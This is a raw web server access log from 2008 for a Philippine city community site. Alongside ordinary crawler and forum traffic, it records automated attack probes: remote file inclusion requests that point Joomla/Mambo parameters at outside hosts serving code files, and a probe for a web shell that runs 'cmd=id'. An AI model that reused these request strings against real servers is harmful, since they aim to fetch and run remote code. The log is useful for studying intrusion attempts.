200.63.42.95 - - [30/Oct/2008:06:19:42 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:19:43 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=idx HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:19:44 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:19:44 -0700] "GET /jodera2/index.php?sid=858e7b3528ebaaf8b102cce9be236784 HTTP/1.0" 200 55136 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:19:46 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:19:47 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=module&module=gallery HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.13.222.135 - - [30/Oct/2008:06:19:48 -0700] "GET /logs/access_081015.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.13.222.135 - - [30/Oct/2008:06:19:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 764 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.13.222.135 - - [30/Oct/2008:06:19:48 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:19:52 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=post&do=new_post&f=9 HTTP/1.1" 200 7724 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
203.146.26.91 - - [30/Oct/2008:06:19:52 -0700] "GET /logs/access_081016.log/phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 770 "-" "libwww-perl/5.79" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:19:57 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:19:58 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=post&do=reply_post&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:19:58 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:58 -0700] "GET /carmels/ HTTP/1.1" 200 8867 "http://www.jenspeters.com/uebernachten/uebernachten_visayas_negros.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:59 -0700] "GET /carmels/2.gif HTTP/1.1" 200 13908 "http://www.sancarloscity.org/carmels/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:59 -0700] "GET /carmels/banner.jpg HTTP/1.1" 200 80845 "http://www.sancarloscity.org/carmels/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:59 -0700] "GET /carmels/6.gif HTTP/1.1" 200 58545 "http://www.sancarloscity.org/carmels/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:59 -0700] "GET /carmels/4.gif HTTP/1.1" 200 14219 "http://www.sancarloscity.org/carmels/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:19:59 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
85.158.226.1 - - [30/Oct/2008:06:19:59 -0700] "GET /carmels/logog.gif HTTP/1.1" 200 22442 "http://www.sancarloscity.org/carmels/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:20:00 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:20:02 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=usercp&CODE=start_subs&method=forum&fid=9 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:20:06 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:20:06 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:20:06 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.805" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:20:08 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=usercp&CODE=start_subs&method=topic&tid=147 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:20:14 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&automodule=blog HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:20:20 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=942a3de1612166bdf00056d0da72ea0f" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:20:20 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&showforum=8 HTTP/1.1" 200 7884 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:20:22 -0700] "GET /jodera2/viewtopic.php?p=29920 HTTP/1.0" 200 31177 "http://www.sancarloscity.org/viewtopic.php?p=29920#29920" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:20:26 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:20:26 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&showforum=9 HTTP/1.1" 200 7884 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:28 -0700] "GET /listings/listing/results.php?category_id=733 HTTP/1.1" 200 47168 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:31 -0700] "GET /listings/listing/results.php?category_id=713 HTTP/1.1" 200 24396 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:41 -0700] "GET /listings/listing/results.php?category_id=722 HTTP/1.1" 200 47383 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:46 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:51 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:56 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:20:58 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:21:11 -0700] "GET /listings/listing/results.php?category_id=754 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.21 - - [30/Oct/2008:06:21:21 -0700] "GET /jodera2/faq.php?sid=7a898cb0e44d924bcf42431d43cef571 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:21:23 -0700] "GET /listings/listing/results.php?category_id=735 HTTP/1.1" 200 31133 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:22:20 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:29 -0700] "GET /listings/listing/results.php?category_id=745 HTTP/1.1" 200 24346 "http://www.sancarloscity.org/listings/listing/results.php?letter=u&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:36 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:40 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:46 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:48 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:50 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:53 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:56 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:22:56 -0700] "GET /jodera2/viewtopic.php?p=29628 HTTP/1.1" 200 33129 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:22:57 -0700] "GET /jodera2/viewtopic.php?p=29642 HTTP/1.1" 200 83155 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:22:58 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/results.php?letter=q&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:23:10 -0700] "GET /listings/listing/results.php?letter=z&category_id=739 HTTP/1.1" 200 25109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
92.250.50.2 - - [30/Oct/2008:06:23:38 -0700] "POST /components/com_simpleboard/image_upload.php HTTP/1.1" 404 779 "-" "libwww-perl/5.813" "www.sancarloscity.org"
195.245.241.51 - - [30/Oct/2008:06:23:39 -0700] "GET /components/com_simpleboard/utyx.php?cmd=id HTTP/1.1" 404 771 "-" "-" "www.sancarloscity.org"
222.236.44.26 - - [30/Oct/2008:06:23:49 -0700] "GET /logs/access_080922.log/?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:23:55 -0700] "GET /logs/access_081007.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:24:19 -0700] "GET /logs/access_070921.log/index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 768 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:24:19 -0700] "GET /index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 758 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:24:26 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:29 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:32 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:35 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:38 -0700] "GET /listings/listing/results.php?category_id=716 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:39 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:42 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:45 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
65.18.170.161 - - [30/Oct/2008:06:24:46 -0700] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 777 "-" "libwww-perl/5.805" "www.sancarloscity.org"
65.18.170.161 - - [30/Oct/2008:06:24:46 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
65.18.170.161 - - [30/Oct/2008:06:24:46 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 772 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:49 -0700] "GET /listings/listing/review.php?listing_id=14946 HTTP/1.1" 200 21496 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:51 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:24:52 -0700] "GET /logs/access_080929.log%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 831 "-" "libwww-perl/5.803" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:53 -0700] "GET /listings/claim.php?claimlistingid=14809 HTTP/1.1" 200 12782 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:55 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:24:57 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:12 -0700] "GET /listings/listing/results.php?letter=j&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:16 -0700] "GET /listings/listing/results.php?letter=r&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:36 -0700] "GET /listings/listing/results.php?letter=q&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:48 -0700] "GET /listings/listing/results.php?letter=p&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:25:55 -0700] "GET /jodera2/viewtopic.php?p=29746 HTTP/1.1" 200 83149 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:55 -0700] "GET /listings/listing/results.php?letter=d&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:25:59 -0700] "GET /listings/listing/results.php?letter=o&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:26:00 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 807 "-" "libwww-perl/5.803" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:01 -0700] "GET /listings/listing/results.php?letter=f&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:26:04 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 812 "-" "libwww-perl/5.803" "www.sancarloscity.org"
